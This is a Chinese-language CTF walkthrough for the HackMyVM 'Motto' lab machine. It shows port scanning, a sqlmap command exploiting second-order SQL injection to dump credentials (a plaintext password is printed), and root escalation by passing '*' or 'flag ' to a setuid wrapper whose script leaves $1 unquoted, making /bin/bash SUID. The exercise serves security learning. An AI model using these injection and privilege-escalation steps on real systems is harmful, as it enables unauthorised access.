HackMyVm-Motto

Motto

靶机地址：https://hackmyvm.eu/machines/machine.php?vm=Motto

信息搜集

10.156.131.124

端口扫描

root@LAPTOP-O235O5EH [~] ➜  rustscan -a 10.156.131.124                                                       [11:24:53]
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
RustScan: Where '404 Not Found' meets '200 OK'.

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'.
Open 10.156.131.124:22
Open 10.156.131.124:80
Open 10.156.131.124:9090
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-19 11:26 CST
Initiating ARP Ping Scan at 11:26
Scanning 10.156.131.124 [1 port]
Completed ARP Ping Scan at 11:26, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 11:26
Completed Parallel DNS resolution of 1 host. at 11:26, 0.10s elapsed
DNS resolution of 1 IPs took 0.10s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 11:26
Scanning 10.156.131.124 [3 ports]
Discovered open port 80/tcp on 10.156.131.124
Discovered open port 9090/tcp on 10.156.131.124
Discovered open port 22/tcp on 10.156.131.124
Completed SYN Stealth Scan at 11:26, 0.02s elapsed (3 total ports)
Nmap scan report for 10.156.131.124
Host is up, received arp-response (0.00074s latency).
Scanned at 2026-01-19 11:26:48 CST for 0s

PORT     STATE SERVICE    REASON
22/tcp   open  ssh        syn-ack ttl 64
80/tcp   open  http       syn-ack ttl 64
9090/tcp open  zeus-admin syn-ack ttl 64
MAC Address: 08:00:27:74:92:47 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.23 seconds
           Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

‍

9090/tcp

注册一个账号，并登录

可以看到有非常多的Mootos每个Mottos对应一个用户名

其中/myinfo可以修改昵称，尝试修改为ll104567

修改之后查看我的Mottos可以看到已经修改了自己的Mottos

已经可以确定是sql注入的二次注入了

‍

sqlmap

sqlmap -r myinfo.txt --batch --second-url "http://10.156.131.124:9090/mymottos" --dump

得到用户凭证

redbean:cannotforgetyou

‍

提权

find / -perm -4000 -type f 2>/dev/null

同时家目录下存在backup备份文件夹

redbean@motto:~/.backup$ cd ~/.backup
redbean@motto:~/.backup$ ls
new.sh  run_newsh.c
redbean@motto:~/.backup$ cat new.sh
#!/bin/bash
PATH=/usr/bin

echo -e "\033[1;35m"
echo '▓▒░ Loading system diagnostics ░▒▓'
echo -e "\033[0m"

echo -e "\033[1;34m[INFO]\033[0m Initializing environment checks:"
for step in A B C; do
    echo -e "\033[1;33m ● Module ${step} status: OK (ver $(($RANDOM%5+1)).$(($RANDOM%20)).$(($RANDOM%500)))\033[0m"
    sleep 0.12
done

echo "Random seed value: $RANDOM"
echo -e "\033[1;34m[INFO]\033[0m Evaluating input parameters..."
sleep 0.15

[ -n "$1" ] || exit 1
[ "$1" = "flag" ] && exit 2
[ $1 = "flag" ] && chmod +s /bin/bash

echo -e "\033[1;34m[INFO]\033[0m Running diagnostic sequence:"
for step in {1..3}; do
    echo -e "\033[1;35m → Executing test ${step} of 3\033[0m"
    sleep 0.2
done

WAIT_TIME=$((RANDOM%5+2))
echo -e "\033[1;36m\nWaiting period: \033[3${WAIT_TIME}m${WAIT_TIME} seconds\033[0m"

for ((i=WAIT_TIME; i>=0; i--)); do
    case $((i%4)) in
        0) COL="34" ;; # 蓝
        1) COL="32" ;; # 绿
        2) COL="31" ;; # 红
        3) COL="36" ;; # 青
    esac

    case $((i%2)) in
        0) echo -e "\033[1;${COL}m>> Waiting T-${i} seconds...\033[0m" ;;
        1) echo -e "\033[1;${COL}m>> Countdown: ${i}\033[0m" ;;
    esac

    [ $i -gt 0 ] && sleep 1
done

RESULTS=(
    "Diagnostics complete."
    "All systems nominal."
    "No errors detected."
    "System stable."
)

FINAL_MSG=${RESULTS[$RANDOM % ${#RESULTS[@]}]}
echo -e "\033[1;32m${FINAL_MSG}\033[0m"
echo -e "\033[1;34mThank you for using the system monitor.\033[0m"

echo -e "\033[1;30m[STATS] Summary Report:\033[0m"
echo -e "    Processes checked: $((RANDOM%60+20))"
echo -e "    CPU load average: $(echo "scale=2; $RANDOM%10+0.5" | bc)"
echo -e "    Uptime (hours): $((RANDOM%100+1))"

redbean@motto:~/.backup$ cat run_newsh.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(int argc, char *argv[]) {
    if (argc != 2) {
        fprintf(stderr, "Usage: %s <arg>\n", argv[0]);
        return 1;
    }

    // 切换为 root 权限（如果以 setuid 运行）
    setuid(0);
    setgid(0);

    // 构造参数，调用 ./new.sh 参数
    char *script = "/opt/new.sh";
    char *args[] = { script, argv[1], NULL };

    execv(script, args);  // 用 execv 调用脚本

    perror("execv failed");
    return 1;
}

new.sh中的

[ -n "$1" ] || exit 1
[ "$1" = "flag" ] && exit 2
[ $1 = "flag" ] && chmod +s /bin/bash

是提权点，前面的$1都是用引号包裹而第三个没有使用引号包裹。

第一个判断是否有用户输入，没有则退出

第二个判断是否等于flag，如果等于则退出

第三个判断是否等于flag，如果等于则给bash +s权限

问题就出在这个引号上面，如果从一开始传入 *​，到第三个的时候Bash 会进行通配符展开，如果展开结果匹配到 “flag”，则执行 chmod +s​，给 Bash 增加 SUID 权限

‍

run_newsh.c的作用是以 root 身份启动上面的new.sh脚本。

二run_newsh.c对应则是/opt下面的run_newsh

redbean@motto:~$ ls
user.txt
redbean@motto:~$ mkdir aaa
redbean@motto:~$ cd aaa
redbean@motto:~/aaa$ touch flag
redbean@motto:~/aaa$ ls
flag
redbean@motto:~/aaa$ /opt/run_newsh "*"

▓▒░ Loading system diagnostics ░▒▓

[INFO] Initializing environment checks:
 ● Module A status: OK (ver 2.4.80)
 ● Module B status: OK (ver 4.8.168)
 ● Module C status: OK (ver 5.14.228)
Random seed value: 21063
[INFO] Evaluating input parameters...
[INFO] Running diagnostic sequence:
 → Executing test 1 of 3
 → Executing test 2 of 3
 → Executing test 3 of 3

Waiting period: 5 seconds
>> Countdown: 5
>> Waiting T-4 seconds...
>> Countdown: 3
>> Waiting T-2 seconds...
>> Countdown: 1
>> Waiting T-0 seconds...
Diagnostics complete.
Thank you for using the system monitor.
[STATS] Summary Report:
    Processes checked: 49
/opt/new.sh: line 60: bc: command not found
    CPU load average:
    Uptime (hours): 36
redbean@motto:~/aaa$ ls -al /bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18  2019 /bin/bash
redbean@motto:~/aaa$

‍

同时也可以使用空格来绕过

/opt/run_newsh "flag "

‍